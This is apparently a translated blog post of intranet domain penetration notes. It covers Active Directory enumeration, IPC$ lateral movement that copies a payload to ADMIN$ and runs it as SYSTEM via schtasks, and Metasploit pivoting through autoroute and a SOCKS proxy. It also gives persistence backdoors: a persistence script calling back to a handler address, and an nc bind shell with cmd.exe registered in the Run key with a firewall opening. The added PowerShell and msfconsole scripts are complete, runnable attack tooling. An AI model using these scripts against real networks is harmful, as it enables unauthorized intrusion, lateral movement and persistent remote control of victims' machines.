Intranet domain penetration study notes

Information collection

Once you hold privileges on the first intranet machine, information collection is a critical step and an indispensable part of intranet penetration.
Look at the network environment of the current machine and collect the relevant information about the domain: all users, all computers, and the key groups.

net user /domain                          list the domain users
net view /domain                          list the domains that are visible
net view /domain:xxx                      list the hosts in domain xxx
net group /domain                         list the groups in the domain
net group "domain computers" /domain      list all host names in the domain
net group "domain admins" /domain         list the domain administrators
net group "domain controllers" /domain    list the domain controllers
net group "enterprise admins" /domain     list the enterprise administrators
net time /domain                          find the time server (normally a domain controller)
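As an added example (not part of the original notes), the same collection done over LDAP from PowerShell with `[ADSISearcher]`. It needs no RSAT module, it does not truncate names the way `net group` does, and it follows nested group membership. The session is assumed to be domain-joined; the group names, property lists and output formatting are my choices, not the page's.

```powershell
# Added example, not from the original notes: domain enumeration over LDAP with
# [ADSISearcher], the counterpart of the net commands above. Assumes a
# domain-joined session; any authenticated domain user can normally read this.

function Get-DomainObjects {
    param(
        [Parameter(Mandatory)] [string]   $Filter,                       # LDAP filter
        [string[]]                        $Properties = @('samaccountname')
    )
    $searcher = [ADSISearcher] $Filter
    $searcher.PageSize = 1000            # paged search; without it the DC caps results at 1000 objects
    foreach ($p in $Properties) { [void] $searcher.PropertiesToLoad.Add($p) }
    foreach ($r in $searcher.FindAll()) {
        $row = [ordered] @{}
        foreach ($p in $Properties) { $row[$p] = @($r.Properties[$p])[0] }
        [pscustomobject] $row
    }
}

# Which domain, and which DC answered (net view /domain, net time /domain)
$rootDse = [ADSI] 'LDAP://RootDSE'
"Domain: $($rootDse.defaultNamingContext)  DC: $($rootDse.dnsHostName)"

# All users (net user /domain); the description field often leaks roles or passwords
Get-DomainObjects '(&(objectCategory=person)(objectClass=user))' -Properties samaccountname, description |
    Format-Table -AutoSize

# All computers with their OS, to choose the next hop (net group "domain computers" /domain)
Get-DomainObjects '(objectCategory=computer)' -Properties dnshostname, operatingsystem |
    Format-Table -AutoSize

# Domain controllers (net group "domain controllers" /domain). DCs belong to that group
# through primaryGroupID (RID 516), not memberOf, so a memberOf filter would miss them.
"== Domain Controllers =="
Get-DomainObjects '(&(objectCategory=computer)(primaryGroupID=516))' -Properties dnshostname |
    ForEach-Object { '  ' + $_.dnshostname }

# Members of the admin groups, including members reached through nested groups
# (1.2.840.113556.1.4.1941 is the LDAP_MATCHING_RULE_IN_CHAIN matching rule)
foreach ($groupName in 'Domain Admins', 'Enterprise Admins') {
    $group = Get-DomainObjects "(&(objectCategory=group)(cn=$groupName))" -Properties distinguishedname
    if (-not $group) { continue }    # Enterprise Admins only exists in the forest root domain
    "== $groupName =="
    Get-DomainObjects "(memberOf:1.2.840.113556.1.4.1941:=$($group.distinguishedname))" -Properties samaccountname |
        ForEach-Object { '  ' + $_.samaccountname }
}
```

The searcher binds to the domain of the current session; to query another domain, build the searcher with an explicit `LDAP://dc=child,dc=corp,dc=local` search root. Every query here is a normal LDAP read, so it shows up on the DC only as ordinary directory traffic, unlike `net` commands that go through SAMR.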

The commands above yield a lot of information (note that net group truncates names longer than 20 characters and needs a reachable domain controller). At this point there are two situations:

either the current host can attack the domain controller directly, or it cannot.

Not being able to attack directly splits into two cases:

if the problem is insufficient privilege, escalate privileges; if the host cannot reach the domain controller at all, compromise some intranet host that can reach it and use that host as a springboard.

When the domain controller cannot be attacked directly because of a permission problem, the following methods can be used to continue the penetration:

  • Use the current meterpreter session to add an intranet route and scan for weak passwords
  • Use PowerShell to scan the intranet (the target must run Windows 7 / Server 2008 R2 or later, where PowerShell ships by default)
  • Set up a socks4a proxy and scan the intranet through it
  • Use the current privileges to perform IPC$ penetration within the intranet
  • Other methods

IPC$ intrusion

IPC$ (inter-process communication) is the named-pipe share that Windows enables by default. Taking control of a computer by authenticating to its IPC$ share with valid or guessed credentials is extremely common on intranets. It needs SMB (TCP 445, or 139) reachable on the target and, for the copy and scheduling steps below, an account that is an administrator there.

 D:\>net use \\127.0.0.1\IPC$                    connect to the IPC$ share on 127.0.0.1 (append "password" /user:domain\user to authenticate as another account)
 D:\>copy srv.exe \\127.0.0.1\ADMIN$             copy srv.exe to the target; IPC$ itself carries no files, so an administrative share such as ADMIN$ (C:\Windows) or C$ is used
 D:\>net time \\127.0.0.1                        read the target's clock; the job time below is the target's local time
 D:\>at \\127.0.0.1 10:50 srv.exe                use at to start srv.exe at 10:50 (at is deprecated from Windows 8 onward; use schtasks /S instead)
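As an added example (not part of the original notes), the same IPC$ sequence from PowerShell using schtasks, which replaced at. It copies to ADMIN$ and triggers the task immediately instead of guessing the target's clock. The host, credential, payload path and task name are placeholders I chose; the account must be a local administrator on the target.

```powershell
# Added example, not from the original notes: the IPC$ sequence above done from
# PowerShell with schtasks, which replaced at. Host, credential, payload and
# task name are placeholders; the account must be a local administrator on the target.
$Target   = '192.168.102.10'
$User     = 'CORP\svc_backup'
$Password = 'P@ssw0rd1'
$Payload  = 'C:\tools\srv.exe'
$TaskName = 'WinSvcSync'

# 1. Authenticate to IPC$; the SMB session is reused by the copy and by schtasks.
net use "\\$Target\IPC$" $Password "/user:$User" | Out-Null
if ($LASTEXITCODE -ne 0) {
    throw "IPC`$ session to $Target failed (445 closed, bad credential, or no admin rights)"
}

try {
    # 2. Copy the binary through an administrative share; ADMIN$ maps to C:\Windows.
    Copy-Item -Path $Payload -Destination "\\$Target\ADMIN$\svchost_sync.exe" -ErrorAction Stop

    # 3. Create a one-shot task running as SYSTEM and fire it now. /ST is mandatory
    #    for /SC ONCE but irrelevant here because /Run starts the task immediately.
    schtasks /Create /S $Target /U $User /P $Password /SC ONCE /ST 23:59 /TN $TaskName `
             /TR 'C:\Windows\svchost_sync.exe' /RU SYSTEM /F | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "task creation on $Target failed" }
    schtasks /Run /S $Target /U $User /P $Password /TN $TaskName | Out-Null

    # 4. Check the result: a populated Last Run Time and a Last Result of 0 or 267009
    #    (task currently running) mean the payload was started.
    schtasks /Query /S $Target /U $User /P $Password /TN $TaskName /V /FO LIST |
        Select-String 'Last Run Time|Last Result'
}
finally {
    # 5. Drop the SMB session; the scheduled task and the copied file stay until cleaned up.
    net use "\\$Target\IPC$" /delete /y | Out-Null
}
```

Once the payload has its own channel, `schtasks /Delete /S <target> /TN WinSvcSync /F` and deleting `C:\Windows\svchost_sync.exe` remove the traces. On the target this sequence produces a network logon (event 4624, logon type 3), share access to ADMIN$ (5145 when share auditing is on) and a task creation event (4698), which is what detection for this technique keys on.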

Pivoting (springboard attack)

  1. Use a compromised edge machine as a springboard to attack other machines in the network
  2. Reach intranet machines that cannot be accessed directly because of routing

Automatic routing (the autoroute meterpreter script is deprecated; post/multi/manage/autoroute is its replacement)

run autoroute -s 192.168.102.0/24
run post/multi/manage/autoroute
Scan the intranet:
run post/windows/gather/arp_scanner RHOSTS=192.168.102.0/24
use auxiliary/scanner/portscan/tcp

proxychains proxy settings

socks proxy

auxiliary/server/socks4a (listens on port 1080 by default; newer Metasploit versions ship it as auxiliary/server/socks_proxy with VERSION set to 4a)

proxychains nmap scan: add the socks port to proxychains.conf and run nmap through proxychains. Only TCP connect scans (-sT) traverse a SOCKS proxy; ICMP and SYN probes do not, so add -Pn.
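The full pivot, as an added msfconsole resource script that is not part of the original notes. The session id, subnet, port list and proxy port are placeholders; the proxychains.conf line and nmap invocation at the end are typed in a normal shell, not in msfconsole.

```text
# Added example, not from the original notes: msfconsole resource script for the
# pivot above. Session id, subnet, scan ports and proxy port are placeholders.
# Run with: msfconsole -r pivot.rc   (or "resource pivot.rc" inside msfconsole)

# 1. Route the intranet subnet through the meterpreter session
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 192.168.102.0
set NETMASK 255.255.255.0
run

# 2. Find live hosts from the session's own ARP table, then port-scan over the route
use post/windows/gather/arp_scanner
set SESSION 1
set RHOSTS 192.168.102.0/24
run
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.102.0/24
set PORTS 22,80,135,139,445,3389
set THREADS 10
run

# 3. Expose the route to external tools as a SOCKS server on 127.0.0.1:1080
use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
set SRVPORT 1080
run -j

# 4. Outside msfconsole: point proxychains at it and scan with connect scans only
#    echo 'socks4 127.0.0.1 1080' >> /etc/proxychains.conf
#    proxychains nmap -sT -Pn -n -p 22,80,445,3389 192.168.102.10
```

Binding SRVHOST to 127.0.0.1 keeps the proxy off the attacker's external interfaces; anyone who can reach the SOCKS port can reach the victim's intranet through the session. On Metasploit versions where socks4a has been merged into socks_proxy, replace step 3 with `use auxiliary/server/socks_proxy` and `set VERSION 4a`.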

Persistent backdoor

metsvc:

Started as a Windows service
run metsvc -A		# uploads the backdoor files and installs the service; -A also starts a matching multi/handler

persistence:

Started at boot or at logon
Features: calls back periodically, calls back when the system starts, runs automatically
run persistence -A -S -U -i 60 -p 4321 -r 192.168.1.101
# -A start a handler automatically, -S install as a service started at boot (SYSTEM), -U also start at user logon, -i 60 retry every 60 seconds, -p 4321 handler port, -r 192.168.1.101 handler address
# both meterpreter scripts are deprecated; post/windows/manage/persistence_exe is the replacement

nc backdoor

Upload nc: upload /root/nc.exe C:\\windows\\system32
Modify the registry
Enumerate the values under the Run key: reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Add an nc value under that key (it runs at every interactive logon, as the user who logs on): reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -L -d -p 444 -e cmd.exe'
Check the nc value: reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
Set up the firewall
Open a cmd channel
execute -f cmd -i -H
Check the firewall status (the netsh firewall context is the pre-Vista syntax; newer systems use netsh advfirewall firewall)
netsh firewall show opmode
Add a firewall rule allowing port 444 through (the port must be the one nc listens on; the original notes opened 445 here, which leaves the backdoor unreachable)
netsh firewall add portopening TCP 444 "Service Firewall" ENABLE
Check the port status
netsh firewall show portopening
Connect
nc -v <target ip> 444
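As an added example (not part of the original notes), the Run-key backdoor done from an elevated PowerShell on the target, with the firewall rule on the same port as the listener and the checks that show whether both halves took. The nc path, rule name and port are placeholders.

```powershell
# Added example, not from the original notes: the nc Run-key backdoor done from an
# elevated PowerShell on the target, with the firewall rule on the listener port and
# the checks that show whether it took. Path, rule name and port are placeholders.
$NcPath   = 'C:\Windows\System32\nc.exe'
$Port     = 444
$RunKey   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$RuleName = 'Service Firewall'
$Cmd      = "`"$NcPath`" -L -d -p $Port -e cmd.exe"   # -L relisten after disconnect, -d detach from console

if (-not (Test-Path $NcPath)) {
    throw "$NcPath missing: upload nc.exe first (a build compiled with -e support)"
}

# Run-key value: executed at every interactive logon, in the context of the user who
# logs on. It does NOT run at boot, so the listener only appears once somebody logs on.
Set-ItemProperty -Path $RunKey -Name nc -Value $Cmd

# Inbound rule on the listener port. The original notes opened 445 while nc listened
# on 444, which leaves the backdoor unreachable from outside the host.
# "netsh firewall" is the pre-Vista context; advfirewall works on every supported Windows.
netsh advfirewall firewall add rule name="$RuleName" dir=in action=allow protocol=TCP localport=$Port | Out-Null
if ($LASTEXITCODE -ne 0) { throw 'firewall rule not added (not elevated?)' }

# Verify both halves
$value = (Get-ItemProperty -Path $RunKey -Name nc).nc
"Run key  : $value"
netsh advfirewall firewall show rule name="$RuleName" | Select-String 'Enabled|Action|LocalPort'

# After the next logon, confirm something is bound before connecting from the attacker:
#   Get-NetTCPConnection -LocalPort $Port -State Listen
#   nc -v <target ip> 444
```

The value lands in HKLM, so it fires for every user who logs on, but each instance runs with that user's rights, not SYSTEM; for a SYSTEM-level listener a service or scheduled task is needed. The Run key and a new allow rule are two of the first places an investigator looks, which is why the metsvc and persistence scripts above are noisier on disk but quieter in the registry.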


Source: blog.csdn.net/p_utao/article/details/108569165